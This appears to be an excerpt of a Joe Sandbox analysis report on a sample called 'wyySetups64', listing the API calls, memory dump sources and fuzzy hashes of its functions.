                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 781180411-0
                                                                                                                                                                                                              • Opcode ID: 8f7b0990ddae8462c3fb30c1e045ad7ceb689a100241d2bd4c9ab7cef22a5082
                                                                                                                                                                                                              • Instruction ID: 9c4c06f56a41e10fe3fa5a820fef2ba706a750521fbbd7dab71bdac5b9e6d5d2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8f7b0990ddae8462c3fb30c1e045ad7ceb689a100241d2bd4c9ab7cef22a5082
                                                                                                                                                                                                              • Instruction Fuzzy Hash: ECE0BF7DE00719B7CB50B7B19D8985F7A7CAD016A1F150450EE15DB200EA29D51187A6
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 0337944A
                                                                                                                                                                                                                • Part of subcall function 0337EF86: std::exception::exception.LIBCMT ref: 0337EF9B
                                                                                                                                                                                                                • Part of subcall function 0337EF86: __CxxThrowException@8.LIBCMT ref: 0337EFB0
                                                                                                                                                                                                                • Part of subcall function 0337EF86: std::exception::exception.LIBCMT ref: 0337EFC1
                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 03379482
                                                                                                                                                                                                                • Part of subcall function 0337EF39: std::exception::exception.LIBCMT ref: 0337EF4E
                                                                                                                                                                                                                • Part of subcall function 0337EF39: __CxxThrowException@8.LIBCMT ref: 0337EF63
                                                                                                                                                                                                                • Part of subcall function 0337EF39: std::exception::exception.LIBCMT ref: 0337EF74
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                                                                                                                                                                                              • String ID: invalid string position$string too long
                                                                                                                                                                                                              • API String ID: 1823113695-4289949731
                                                                                                                                                                                                              • Opcode ID: 2fad3911d20800043290ee8f6863df2922e069065c1805be8387bf179f35747c
                                                                                                                                                                                                              • Instruction ID: e6fc1ab60938138aaba70af3ec9900e407ca8be717d1e4fddd7b9f854e1d44d6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2fad3911d20800043290ee8f6863df2922e069065c1805be8387bf179f35747c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5A21A5377102149BD731EE6CECC0B5AF7E9EB91664B250B6FE192CB640D765D880C3A1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 033784C9
                                                                                                                                                                                                                • Part of subcall function 0337EF86: std::exception::exception.LIBCMT ref: 0337EF9B
                                                                                                                                                                                                                • Part of subcall function 0337EF86: __CxxThrowException@8.LIBCMT ref: 0337EFB0
                                                                                                                                                                                                                • Part of subcall function 0337EF86: std::exception::exception.LIBCMT ref: 0337EFC1
                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 033784E7
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                                                                                                                                                                                              • String ID: invalid string position$string too long
                                                                                                                                                                                                              • API String ID: 963545896-4289949731
                                                                                                                                                                                                              • Opcode ID: 6959d8dc4fea10eca9eb703421664e0019c726d12cc3cd81bb05ebdc822548ee
                                                                                                                                                                                                              • Instruction ID: 4eafed6401a4fc43a97b7e44ceb50cfde45c9276df32217ffbeca20eac9c3adb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6959d8dc4fea10eca9eb703421664e0019c726d12cc3cd81bb05ebdc822548ee
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8A21A235B10306DF8B24DF6CE8C5C59B3AABF88364714466AF516CF641E734EA54C790
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ___BuildCatchObject.LIBCMT ref: 00B33A3A
                                                                                                                                                                                                                • Part of subcall function 00B33995: ___BuildCatchObjectHelper.LIBCMT ref: 00B339CB
                                                                                                                                                                                                              • _UnwindNestedFrames.LIBCMT ref: 00B33A51
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116355062.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_b20000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: BuildCatchObject$FramesHelperNestedUnwind
                                                                                                                                                                                                              • String ID: csm$csm
                                                                                                                                                                                                              • API String ID: 3487967840-3733052814
                                                                                                                                                                                                              • Opcode ID: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
                                                                                                                                                                                                              • Instruction ID: 6440370d195759820379d8f677f9af03d51fa9fbd4961ba21259bb462cc83b15
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4201F63100010ABBDF12AF51CC46EAF7FEAEF08754F208050BD5815261D772DAB1DBA1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsBadReadPtr.KERNEL32(?,00000014), ref: 0337D868
                                                                                                                                                                                                              • IsBadReadPtr.KERNEL32(?,00000014), ref: 0337D938
                                                                                                                                                                                                              • SetLastError.KERNEL32(0000007F), ref: 0337D963
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
• Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Read$ErrorLast
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2715074504-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4119630030.00000000031F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031F0000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_31f0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __calloc_crt__init_pointers__mtterm
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2478854527-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116355062.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_b20000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __calloc_crt__init_pointers__mtterm
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2478854527-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00BDE459
                                                                                                                                                                                                              • __isleadbyte_l.LIBCMT ref: 00BDE48C
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 00BDE4BD
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 00BDE52B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
• Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3058430110-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0338A5F6
                                                                                                                                                                                                              • __isleadbyte_l.LIBCMT ref: 0338A629
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 0338A65A
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 0338A6C8
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
• Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3058430110-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
• Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrlen$_memset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2425037729-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetLastError.KERNEL32(0000139F), ref: 00BD43EC
                                                                                                                                                                                                                • Part of subcall function 00BD13A0: HeapAlloc.KERNEL32(00000000,00000000,?,?,?,?), ref: 00BD13CB
                                                                                                                                                                                                                • Part of subcall function 00BD4C50: HeapFree.KERNEL32(?,00000000,?,00000000,00BD4E35,?,00BD42C8,00BD4E35,00000000,?,?,00BD4E35,?), ref: 00BD4C77
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?), ref: 00BD43D7
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000057), ref: 00BD4401
                                                                                                                                                                                                              • WSAGetLastError.WS2_32(?), ref: 00BD4410
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
• Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$Heap$AllocFree
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1906775185-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetLastError.KERNEL32(0000139F), ref: 033743EC
                                                                                                                                                                                                                • Part of subcall function 033713A0: HeapAlloc.KERNEL32(00000000,00000000,?,?,?,?), ref: 033713CB
                                                                                                                                                                                                                • Part of subcall function 033741E0: EnterCriticalSection.KERNEL32(03374FB5,03374E55,033742BE,00000000,?,?,03374E55,?,?,?,?,00000000,000000FF), ref: 033741E8
                                                                                                                                                                                                                • Part of subcall function 033741E0: LeaveCriticalSection.KERNEL32(03374FB5,?,?,?,00000000,000000FF), ref: 033741F6
                                                                                                                                                                                                                • Part of subcall function 03374C70: HeapFree.KERNEL32(?,00000000,?,00000000,03374E55,?,033742C8,03374E55,00000000,?,?,03374E55,?), ref: 03374C97
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?), ref: 033743D7
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000057), ref: 03374401
                                                                                                                                                                                                              • WSAGetLastError.WS2_32(?), ref: 03374410
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$CriticalHeapSection$AllocEnterFreeLeave
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2060118545-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _free.LIBCMT ref: 0337DE93
                                                                                                                                                                                                              • _free.LIBCMT ref: 0337DED5
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,0337DC95), ref: 0337DEFC
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0337DF03
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap_free$FreeProcess
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1072109031-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WSAEventSelect.WS2_32(?,00BD3ABB,00000023), ref: 00BD3C02
                                                                                                                                                                                                              • WSAGetLastError.WS2_32 ref: 00BD3C0D
                                                                                                                                                                                                              • send.WS2_32(?,00000000,00000000,00000000), ref: 00BD3C58
                                                                                                                                                                                                              • WSAGetLastError.WS2_32 ref: 00BD3C63
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$EventSelectsend
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 259408233-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WSAEventSelect.WS2_32(?,03373ABB,00000023), ref: 03373C02
                                                                                                                                                                                                              • WSAGetLastError.WS2_32 ref: 03373C0D
                                                                                                                                                                                                              • send.WS2_32(?,00000000,00000000,00000000), ref: 03373C58
                                                                                                                                                                                                              • WSAGetLastError.WS2_32 ref: 03373C63
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$EventSelectsend
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 259408233-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3016257755-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3016257755-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4119630030.00000000031F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031F0000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_31f0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3016257755-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116355062.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_b20000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3016257755-0
                                                                                                                                                                                                              • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                                                                                                                              • Instruction ID: 2c7453700ae3641b48d28b2a8939d8f19bc4f6fb23cf5149969b77ec5a828850
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 85116D3200415ABBCF169E84EC51CEE3FB2BF18350B5888A4FE1C58031C636C9B1AB85
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(03374FB5,03374E55,033742BE,00000000,?,?,03374E55,?,?,?,?,00000000,000000FF), ref: 033741E8
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(03374FB5,?,?,?,00000000,000000FF), ref: 033741F6
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(03374FB5), ref: 03374257
                                                                                                                                                                                                              • SetEvent.KERNEL32(8520468B), ref: 03374272
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CriticalSection$Leave$EnterEvent
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3394196147-0
                                                                                                                                                                                                              • Opcode ID: 9bb9d00b3b44ed315699758d7464957a79aaae2da8550008b900916b4c989053
                                                                                                                                                                                                              • Instruction ID: 4d50dd0bc7e5ce7d953a1114d1edae75f90892c1bc4583f1f71409d85f6c2da1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9bb9d00b3b44ed315699758d7464957a79aaae2da8550008b900916b4c989053
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2011F5B0601B09EFD765CF75D9C4A97B7E9BF48300F15896EE45A8B210EB35E811CB00
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • timeGetTime.WINMM(00000001,?,00000001,?,00BD3C4F,?,?,00000001), ref: 00BD4AF5
                                                                                                                                                                                                              • InterlockedIncrement.KERNEL32(00000001), ref: 00BD4B04
                                                                                                                                                                                                              • InterlockedIncrement.KERNEL32(00000001), ref: 00BD4B11
                                                                                                                                                                                                              • timeGetTime.WINMM(?,00BD3C4F,?,?,00000001), ref: 00BD4B28
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: IncrementInterlockedTimetime
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 159728177-0
                                                                                                                                                                                                              • Opcode ID: 45e87ad6e8e5482180ac3a07973a39e72ce44e5a5629eca88db6ec3e0e521b96
                                                                                                                                                                                                              • Instruction ID: 90ca490b29e50cc276cd42b04762cd8125fd4689a09007f2f9402e6cac5393c4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 45e87ad6e8e5482180ac3a07973a39e72ce44e5a5629eca88db6ec3e0e521b96
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5801C8B1600B059FC760DF6AD88094AFBE9AF58750700892AE549C7711E774E6458F90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • timeGetTime.WINMM(00000001,?,00000001,?,03373C4F,?,?,00000001), ref: 03374B15
                                                                                                                                                                                                              • InterlockedIncrement.KERNEL32(00000001), ref: 03374B24
                                                                                                                                                                                                              • InterlockedIncrement.KERNEL32(00000001), ref: 03374B31
                                                                                                                                                                                                              • timeGetTime.WINMM(?,03373C4F,?,?,00000001), ref: 03374B48
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: IncrementInterlockedTimetime
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 159728177-0
                                                                                                                                                                                                              • Opcode ID: 0e177de0c34a299e184ccf8c18cce01920a14cd3210eac452c8fd401d03b4f07
                                                                                                                                                                                                              • Instruction ID: 2a5f25cb0e7a5c773dd37b4b892846a7818c0d21703ba4f26a957d4d113c8ef8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0e177de0c34a299e184ccf8c18cce01920a14cd3210eac452c8fd401d03b4f07
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2401C8B5A00709AFC760EF7AD88094AFBECAF5C650700892AE549C7610E775E5448FA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 00BD3667
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD369C
                                                                                                                                                                                                                • Part of subcall function 00BD6E49: HeapFree.KERNEL32(00000000,00000000,?,00BD9900,00000000,?,00BD9FB0,00000000,00000001,00000000,?,00BDC0CF,00000018,00BE7C70,0000000C,00BDC15F), ref: 00BD6E5F
                                                                                                                                                                                                                • Part of subcall function 00BD6E49: GetLastError.KERNEL32(00000000,?,00BD9900,00000000,?,00BD9FB0,00000000,00000001,00000000,?,00BDC0CF,00000018,00BE7C70,0000000C,00BDC15F,00000000), ref: 00BD6E71
                                                                                                                                                                                                              • _malloc.LIBCMT ref: 00BD36D7
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00BD36E5
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp
